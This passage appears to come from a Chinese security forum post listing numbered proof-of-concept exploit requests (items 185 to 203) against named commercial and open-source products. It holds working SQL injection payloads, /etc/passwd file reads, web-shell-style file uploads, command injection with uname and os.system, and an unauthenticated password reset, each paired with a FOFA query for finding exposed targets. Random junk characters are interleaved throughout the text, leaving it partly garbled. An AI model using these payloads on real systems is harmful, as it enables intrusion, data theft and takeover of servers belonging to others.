Content-Type: text/xml; charset=utf-8
$ y- ~* O" I# f7 J- |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 K4 b9 i% L4 i0 @' S0 E0 T" [
X-Requested-With: XMLHttpRequest O! p# z/ R# V
3 e& w0 c y% i9 z/ Q8 f- N" e. G* I
% V- P: j& l# k8 Oinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
, x. j" K. j" R" |% L2 J# a( m$ D9 `* ^4 V$ O0 U/ i' e. w
/ M+ v# B: n- g; H185. 瑞友天翼应用虚拟化系统SQL注入
% u: {1 _" ^+ w( j# P4 S7 bversion < 7.0.5.1
+ L4 T& _; t3 \% p% FFOFA:app="REALOR-天翼应用虚拟化系统"5 }) \- @! ]4 R0 \
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.11 P4 U. ^* s6 D! M4 q( D! O, w
Host: host
+ x6 s: O0 X t7 v! A6 A8 V6 \( F2 a1 p
# E q* D. Y9 s) V j8 y4 e0 U5 N1 W186. F-logic DataCube3 SQL注入
0 T$ }1 ]% @/ l# j; f" pCVE-2024-31750
) }) d6 ?7 E3 r' Q u' e) P3 B: yF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
8 C1 i6 A# S7 _: V6 T) lFOFA:title=="DataCube3"
- B! @7 ?3 `# w* S& H, PPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 _7 r# I: f1 C* G! XHost: your-ip
! u$ d) U. m9 Q: q6 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
+ q9 ? C2 ~& X& Q# \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
3 W$ Q0 Z7 e2 f' kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, a9 T3 Q0 W2 A. b, uAccept-Encoding: gzip, deflate3 {# M# N- V$ [
Connection: close! c% S0 Z. E* U. C
Content-Type: application/x-www-form-urlencoded
! f1 B& k/ d" p+ b1 d) S ^* L
/ R6 y4 A6 G5 W% l* Ereq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450, R; I! e, L7 \1 g; E9 N
% v9 t" A/ l! W: |# E
1 \( A* P0 ]. O9 H) F
187. Mura CMS processAsyncObject SQL注入
: y i3 f5 C$ I% ~9 @& _$ N" k0 yCVE-2024-32640
$ U( j1 k: O) B. BFOFA:"Mura CMS"
+ T$ m! Y9 U/ OPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! K3 u0 F+ I, N2 c- N3 R
Host: your-ip
- I) ^9 l" T- I' p. W- r; ^2 Y4 `Content-Type: application/x-www-form-urlencoded3 n! T( s3 s3 ]
0 A( f. y( N' U/ ]9 w
9 x$ B. [+ G& L+ u4 Bobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
. }5 |* v, n1 |
/ ~ k5 H0 I, r+ ^/ {, S9 y; M8 i5 y. r9 ~: h! ] r
188. 叁体-佳会视频会议 attachment 任意文件读取
/ T' S& v/ Q$ m7 ?7 {# ?2 Dversion <= 3.9.7& n' C" Y! }8 r0 _
FOFA:body="/system/get_rtc_user_defined_info?site_id"
) B: R7 Y8 R- U; Z- qGET /attachment?file=/etc/passwd HTTP/1.1
3 t1 `2 k! g* f Z) e$ ~Host: your-ip# I7 V# o9 t. r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# b8 P2 ~, }6 h. T' F* I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( U, b8 y" \& p2 C, u4 B9 D5 ^
Accept-Encoding: gzip, deflate
/ J n6 d4 I' T; W$ X5 AAccept-Language: zh-CN,zh;q=0.9,en;q=0.8, w+ N+ w j K; V8 f& @. H. Q
Connection: close
6 O, d- W, D/ x; o2 w2 d4 ], E
5 {+ L* B4 B b
1 ^8 B6 t a5 a; C. S189. 蓝网科技临床浏览系统 deleteStudy SQL注入) _; I6 i7 Y; h. _
FOFA:app="LANWON-临床浏览系统"3 ?, k+ ~0 X H6 X, U
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
% I9 f% p0 A& ]% ^7 D4 k" GHost: your-ip
: D$ m* s9 `! k* sUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& ^/ g; n; \- w) E8 X4 K% V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- d" p0 @- ?3 T/ B+ d4 |
Accept-Encoding: gzip, deflate! ]8 c8 a2 B/ f" p/ x
Accept-Language: zh-CN,zh;q=0.9
2 o3 }1 W: V& ] q/ d7 }, wConnection: close
4 m# f# ]" O2 v% u) x% G% V! L9 j' a+ z
" \9 ]% q8 N* A" U1 @: R; v+ t
190. 短视频矩阵营销系统 poihuoqu 任意文件读取# U; ?$ Q" J! |/ D9 ]9 \7 q7 e% }
FOFA:title=="短视频矩阵营销系统"& @, {9 r2 C: P |" |. k- q9 l
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
1 Y2 h( V/ S) P& _( h* |9 CHost: your-ip
2 q* R( q7 T) O' N7 X7 L: L% {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36: l4 G% k# }" i0 ^) y% V5 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. V* `' d9 O. ^/ H4 jContent-Type: application/x-www-form-urlencoded+ c. @5 o1 Y- K' f ]1 e
Accept-Encoding: gzip, deflate
+ ]2 v6 [: P! E5 n+ s2 r1 N5 jAccept-Language: zh-CN,zh;q=0.9
' `) {) ~, b( B" T* x1 `+ k" c" I$ b* m+ W0 a
poi=file:///etc/passwd) J7 d. P: X: \- M
' r1 S( A8 u G, F
/ ~. T$ ^$ E5 g2 p- }
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
2 D6 B" v% a9 n7 u: t' NFOFA:body="/CDGServer3/index.jsp"' W$ g4 J- G8 U: M/ a
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
' Z' H% U/ |# h0 I6 A `5 tHost: your-ip# J- `/ Q3 Z h, {$ Y. Z- U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ j" d9 ~7 L5 o/ Y% p* V/ SContent-Type: application/x-www-form-urlencoded0 l7 c4 E& y3 D$ d! z D1 W
; N' ]! y' M1 e/ F ]6 M, X
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=) W) J9 E6 U" c6 x5 _; \1 M
# [2 J% [/ a1 M) {
4 p5 v' s4 M4 _& r2 y4 z7 y- u192. 富通天下外贸ERP UploadEmailAttr 任意文件上传; M2 b7 H& ^; P! i4 w6 g
FOFA:title="用户登录_富通天下外贸ERP"
2 H2 O9 F! f/ c& j Y% [POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
0 F+ j$ q4 t! \0 {, z# h: lHost: your-ip# |4 t3 G7 x* _% p" F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* C9 A( h+ y- I* l1 r7 H$ k
Content-Type: application/x-www-form-urlencoded
) E$ M9 h( J3 [! P0 K; Y# I
7 d6 J( B0 B5 O3 l; C
/ }# G2 V4 z* c* \<% @ webhandler language="C#" class="AverageHandler" %>) n6 D! d( ^3 \& v; b
using System;
5 f ~& I5 ^% X! ~- d" pusing System.Web;, U5 D8 `+ v1 @8 I* X
public class AverageHandler : IHttpHandler; Y Z' D9 M( g0 {8 v
{
7 P* P. | _6 ]1 C. T, l1 Ypublic bool IsReusable# }8 b# `. T# f c- a, \) _
{ get { return true; } }, \6 k ]' H# Z8 d( V
public void ProcessRequest(HttpContext ctx)
( W/ [4 s. ]$ i4 U+ Q{
. f; Y9 e/ J; Uctx.Response.Write("test");7 x) p, s& d4 |* @
}1 [; H: L: a1 I3 m# [6 i' P
}; J0 B/ t: ]. n8 `& M/ A
5 `6 L( j$ Z2 M* U
1 ]# ]# P$ r& `2 D f3 b% k7 K; h
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: g0 h; E, B* W @4 j% k
FOFA:body="山石云鉴主机安全管理系统"
7 f9 ]9 @! e9 r' e8 P) B( \GET /master/ajaxActions/getTokenAction.php HTTP/1.1
1 {9 n/ [, P! KHost:
8 w8 z) B) x% ^" r$ i, ~Cookie: PHPSESSID=2333333333333;/ T: W- `2 F2 M& G k2 ]8 _9 Y$ S
Content-Type: application/x-www-form-urlencoded5 o8 i, v% q5 [+ w
User-Agent: Mozilla/5.0 g/ e$ M( \( Q5 L J+ M
0 Z2 ?4 @# d* @3 j0 l0 h v% z, \. n+ B
% z) z4 V# _ s8 X2 s
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1/ p4 }0 y" Y, W
Host:
8 L' j9 Q9 E8 c' @User-Agent: Mozilla/5.0+ s( P+ X5 D# A
Accept-Encoding: gzip, deflate
9 K' B# O! |8 s2 ^* h8 \1 W% qAccept: */*; p; J- H5 J/ f6 ]
Connection: close/ Y p' |( ^4 B& `
Cookie: PHPSESSID=2333333333333;- \3 F" L" c4 a- c: z/ C* Y! j
Content-Type: application/x-www-form-urlencoded5 Y2 p% D! z$ v. |+ a# m t
Content-Length: 84- |6 S+ I) G" c1 ^% _
# F% J! {( G" F7 w; Zparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
; U# A2 F; c* ~0 I
" c! B3 ^7 r8 b
; F& O- H$ u8 i" p6 ^GET /master/img/config HTTP/1.1
* f- `0 a- e1 `9 a" r9 [, LHost:+ o" ~/ I! r7 X( @( H
User-Agent: Mozilla/5.02 ]7 g/ ~; Z# j3 M4 x+ ^4 k
) n9 q' P0 a: ^3 W5 I
( L6 L K8 |5 M2 ?! B
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. d; j$ d+ A* n% X* ~2 h5 T
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' y0 B3 R$ I# n& T# q( Q) b- V/ w; i
POST /servlet/uploadAttachmentServlet HTTP/1.11 { G; _2 j0 O
Host: host; l$ K/ F0 V3 H$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" C) b0 d0 q5 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) g, O% I- | hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 t' y1 p, G' o$ R- I) V1 `Accept-Encoding: gzip, deflate
' h. \* H/ a; o1 k4 ZConnection: close: m$ \0 [5 I" J6 z5 G0 j( P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk& o$ T& T; k; e& [' E8 b4 y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk% Y6 u. E; T0 Y1 F$ N' F
/ d1 G) r2 f9 `% u- OContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp" F) w1 x, x6 {: w5 I& r+ Y
Content-Type: text/plain$ f! G, I+ Q+ I2 Q
<% out.println("hello");%>% K/ B6 m6 p7 e9 Q& V1 c" B" @# U
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
% L+ ?& i% j. U C. g tContent-Disposition: form-data; name="json"! f5 @& l- S' b. r3 E6 S# e
{"iq":{"query":{"UpdateType":"mail"}}}
. Z( g3 V% U& x1 o0 }2 L! T------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' @# Q: L7 m9 h
) [! j u6 Q! C9 }( v/ g) Z
$ p1 p- _! Y/ }* G( g195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; V8 l: w" F+ \* k
FOFA:title=="飞鱼星企业级智能上网行为管理系统4 G0 j$ Z3 H b. Y
POST /send_order.cgi?parameter=operation HTTP/1.1
4 C: f+ C/ E8 x9 FHost: 127.0.0.1
, e# t1 }% x6 ?: cPragma: no-cache
+ V9 X6 c- T7 y3 p" S" `" HCache-Control: no-cache
; d0 X! `5 C+ Z* }9 `. R* {7 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36( w! u3 a$ S0 S7 M1 z
Accept: */*
5 X2 f' q6 T" N3 B# Z4 N" PAccept-Encoding: gzip, deflate
. w, [, X2 a2 }9 i3 h/ ~$ s8 TAccept-Language: zh-CN,zh;q=0.9
0 ^0 T. Y( s6 c$ ~Connection: close
2 G. E9 j! U! B o/ uContent-Type: application/x-www-form-urlencoded5 W' s/ M# I5 }
Content-Length: 688 b$ K/ U2 r# r: H$ ^3 w! ?7 E
+ ^4 X- ~/ m# h1 ?( q
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
$ \( w0 ^5 j( U4 Y- c3 i0 V w& f4 Q W$ D+ v' m
& j5 ~" b' p- g0 U9 C* z! A196. 河南省风速科技统一认证平台密码重置; H. x' h8 W) p- w9 j
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
$ M; h3 Y' J( `& b! c& \7 }. iPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
& B0 [$ f( {/ T$ E* i. m" \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; G9 m& w! n( u* ]) W
Content-Type: application/json;charset=UTF-8
+ r& d. x1 u j) XX-Requested-With: XMLHttpRequest
' v8 w- U% K- r: RHost:
- n/ f9 A; c( S7 CAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2* \, b: ?& A4 K) d: k* [( l. m
Content-Length: 45
! Z& ?, v$ u% l3 D- Z$ d. r) OConnection: close
; d: t( s! d6 G7 z9 ^4 @; ?5 o# _# |' {, u7 D! }
{"xgh":"test","newPass":"test666","email":""}% E" {+ X3 X2 p; a6 i/ l7 y {
. W* t [1 A3 ^& T) q
. [! ^4 N7 `# b, r7 P
% R, Z. Q+ s/ } N& E+ i
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入5 E+ n! I5 M2 _5 {
FOFA:app="浙大恩特客户资源管理系统"
, I( H* \* \& c/ G( `# v& X! XGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1; Z3 c* q6 n: b' M+ g; V
Host:7 O0 C- E( Y8 h: X9 D+ \; ]- d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.363 V1 `) Z, s& U: C4 T: O. L( b
Accept-Encoding: gzip, deflate
2 S) L U! _0 l) W8 [Connection: close3 ] Z. x) C: i4 q$ @& l" q
* Z" M" J* W9 {% C2 I/ v& ~' A: `0 _
4 e" r2 @' q4 k d8 f
* `9 }( S1 B7 O$ `7 ~- S8 O, N198. 阿里云盘 WebDAV 命令注入
- t0 @) i# `; k7 @CVE-2024-29640
" |" t3 Q2 M. F8 q0 P! FGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1% b/ }; V8 d) Y
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf640 o0 B* {% I- x' l4 ]( d
Accept: */*
+ E4 x B1 h1 e! O$ a5 y% n% B: m, FAccept-Encoding: gzip, deflate6 \7 l) R% s* c
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6$ M& e" R% ~, G' O N
Connection: close6 F' ?9 ~5 g' s. T& R
7 v( Y8 Y. I5 U7 q
- G u& }0 W$ {0 B7 c2 v9 N5 d199. cockpit系统assetsmanager_upload接口 文件上传4 q; i# _' t! B, S1 Z; b0 c* U
1 x* N4 ~. f( A- D1 }
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:, R( R8 X5 ^) m9 }% j
GET /auth/login?to=/ HTTP/1.18 r' l2 A4 L8 n
9 A5 \$ ?; |. a% e2 y' R3 n
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
6 }, [& P! m. K) j
# O& S2 F# \& n; |8 S2.使用刚才上一步获取到的jwt获取cookie:
7 Z0 y1 D* W3 M) D% r( J9 \6 y/ @% x. \" m7 u8 W0 r! G& z$ a# K6 Z- y
POST /auth/check HTTP/1.1
1 I$ d K& P8 q/ m, B. dContent-Type: application/json
! ~ x: o, S$ d/ y) W7 n D2 f7 a( l* A: n3 s& g9 H' @5 B" S, m
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
9 {) N' b. v E/ Z9 m" |1 B! ?5 J2 l2 X) t3 I7 {* Q1 [- x/ {) J. V
响应:200,返回值:
" ~ v5 n4 w" N4 L! `: XSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/3 U9 m, b+ T. X9 w8 b/ r, h/ Y
Fofa:title="Authenticate Please!"
! n S0 M6 B9 Q) R3 A" vPOST /assetsmanager/upload HTTP/1.12 K) I0 \$ H& U& `1 e% b: `) ~
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
0 x, ]5 a5 _3 F% U2 sCookie: mysession=95524f01e238bf51bb60d77ede3bea925 [' o- X* W# v7 E
# {. b# a) Y0 J8 f6 H- V-----------------------------36D28FBc36bd6feE7Fb3
4 d8 P0 k' A. D h1 ? BContent-Disposition: form-data; name="files[]"; filename="tttt.php"% N1 _9 i: n ^$ i; u
Content-Type: text/php
$ m2 E0 ?& b( ~0 R' z$ p7 A9 `5 ?$ D2 n
<?php echo "tttt";unlink(__FILE__);?>' l4 x S* O% I* }
-----------------------------36D28FBc36bd6feE7Fb3
( I' \: ~3 B4 K6 r5 l8 gContent-Disposition: form-data; name="folder"+ A! M* H( M* Z- _' e
, {% W$ G! [+ m/ ]! C
-----------------------------36D28FBc36bd6feE7Fb3--7 v- Z" {: l6 @- |; X+ _
7 w/ G" \, @& J5 b1 F; f5 i. {% k
4 v) P* z" b1 |( I$ X/storage/uploads/tttt.php
2 v1 B( T7 R1 ^' ~! s( b2 k5 M4 @* q! O; d
200. SeaCMS海洋影视管理系统dmku SQL注入
' G6 F+ K# T+ f' h' ]' Q# LFOFA:app="海洋CMS"
" o8 u# n0 z) L5 _1 jGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ q& @8 @+ a/ R- c% K
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
. `0 j5 d) |, `Upgrade-Insecure-Requests: 1& U7 D: V" f. Y- c. T; m; T
Cache-Control: max-age=0
* ?! [: l* G$ |/ `9 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- d+ Z X' ^' \
Accept-Encoding: gzip, deflate
8 L+ h( j! K4 O: V: }Accept-Language: zh-CN,zh;q=0.9
* h' z# I8 ]0 y4 u/ E
9 e' P w& A3 C% U
9 ~6 h# V' C h* i- E' l n201. 方正全媒体新闻采编系统 binary SQL注入% |0 p/ {, D+ ]
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"- F& @. ^! ^1 ^ w1 W# K' I
POST /newsedit/newsplan/task/binary.do HTTP/1.1- x1 V- |* x) a1 E2 t
Content-Type: application/x-www-form-urlencoded0 |$ D1 c, b9 p7 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 r) ?7 F: |% p2 KAccept-Encoding: gzip, deflate4 q' X4 O* N0 p9 J# [# E6 T
Accept-Language: zh-CN,zh;q=0.99 M" }! [8 |$ w, M- l) K
Connection: close
2 ]' m; S/ Q) D$ o5 q v( x1 S, ]$ x' X
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1% {' m7 `) V; Y
: I/ z+ h. }5 j- A( ~8 X. y3 `! _& ]: v. X$ V
202. 微擎系统 AccountEdit任意文件上传6 v1 T0 C9 A' t
FOFA:body="/Widgets/WidgetCollection/" ^2 c) K" I* G' T; c1 _, C
获取__VIEWSTATE和__EVENTVALIDATION值" y/ \6 R3 c. }+ l& Z2 v$ A
GET /User/AccountEdit.aspx HTTP/1.1( b3 Q* ~; B$ P
Host: 滑板人之家" o. n& N& N+ Y1 d+ G* N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
' k7 p" i: p5 @3 P& ]* F xContent-Length: 0& d3 Y a- w! @# H) b# u
& G d p( I0 M9 m
% {6 ^7 A" Q/ h# k5 y: P- D* M# c替换__VIEWSTATE和__EVENTVALIDATION值
( W6 x+ f+ t1 U9 t1 P% BPOST /User/AccountEdit.aspx HTTP/1.1' x M3 ~% u, S$ F- }
Accept-Encoding: gzip, deflate, br
~& O/ K- T2 b n2 \Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687: t6 t8 A9 A5 V h% Y
6 [+ j: x1 N. r' O
-----------------------------786435874t38587593865736587346567358735687
# _8 k9 C" i5 E0 e X8 | eContent-Disposition: form-data; name="__VIEWSTATE"3 w) p. ^) f) V
8 ?# t* {8 |5 z# U v: F__VIEWSTATE
9 o9 M3 ^/ U: l9 C- W a-----------------------------786435874t38587593865736587346567358735687
, |! s( f. r. A9 H& LContent-Disposition: form-data; name="__EVENTVALIDATION"
. c' u' d7 A. X" |, q- Q2 k! [+ G# C) [- F# S
__EVENTVALIDATION; T& W* F2 v) [$ H
-----------------------------786435874t38587593865736587346567358735687$ ]+ l: T4 O) @" y7 ?7 v" _, |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
: Q1 c" v' [& a1 `0 }Content-Type: text/plain5 _8 G5 `- E- z$ o+ A
% z6 z4 n" B8 QHello World!) h" O2 y! b5 `4 U
-----------------------------786435874t385875938657365873465673587356874 n6 _! u" x8 R
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload", G0 ~8 r5 |5 V9 R: |+ p8 }
; x9 g, X- {0 |/ ?& r& D+ Y
上传图片/ K" F8 y9 A r# x' p. a7 ?
-----------------------------786435874t38587593865736587346567358735687
0 B! I r1 J( X6 ~7 A, x1 {Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
0 d* M+ x8 s0 u% m6 G7 ?/ m, r% A4 t& |4 }* A
# M& g4 b6 r" e% P% Q-----------------------------786435874t38587593865736587346567358735687
$ L2 A4 Q# c! Q( c8 {5 JContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
- [% ]6 ~& F- f" ^, O- S8 f, m+ H: R- G6 Y* a" L0 P% f: P: {0 c; h
% H u x# c( x- {, Q-----------------------------786435874t38587593865736587346567358735687--/ m6 ^% \8 V. }
& J3 Y1 J- O, x
" q: y7 D- P1 h2 y1 J
/_data/Uploads/1123.txt
" `* P: o/ ]2 {6 `" @9 k% u* i- J# ~- _0 l/ J! ]
203. 红海云EHR PtFjk 文件上传
; B6 e5 L. \8 I8 d* `* DFOFA:body="RedseaPlatform"
# ?" ?; I" H% z: [( K2 I1 wPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1' G# Z l) k2 \2 g5 V
Host: x.x.x.x
; Y$ }4 N% y$ o) |9 ^Accept-Encoding: gzip
. O! b$ L4 K- n0 s7 F- j9 `8 c5 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 N; c& G2 ^, V3 T6 @Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4& ~$ V4 n" w r2 c# k* a2 J% a, |3 R
Content-Length: 210( }0 ^# o; r6 Z" [
2 @' X8 r$ m( U: b, e# C2 }------WebKitFormBoundaryt7WbDl1tXogoZys4
1 x$ b6 t c1 m: d$ }Content-Disposition: form-data; name="fj_file"; filename="11.jsp"0 X& Z- O% g: V9 R* d
Content-Type:image/jpeg
8 o# q# z, W- w! T) L. p# K! p" g6 G. g
<% out.print("hello,eHR");%>
, l8 n }5 ~4 F' \" d* G) I------WebKitFormBoundaryt7WbDl1tXogoZys4--- Y0 g& [- a! F& S% Q# X# m2 \
" q* ?9 O- o% F& u! B1 J1 X# D. P' | ( h/ W. G: {1 h9 D1 e7 {3 J
4 f- ?. P [8 L
/ O- S% Q* O8 o1 m6 z
Y1 t; x M b% l% i# j3 _6 T! G. L( U: H1 R, S
|
发表于 2024-6-5 14:31:29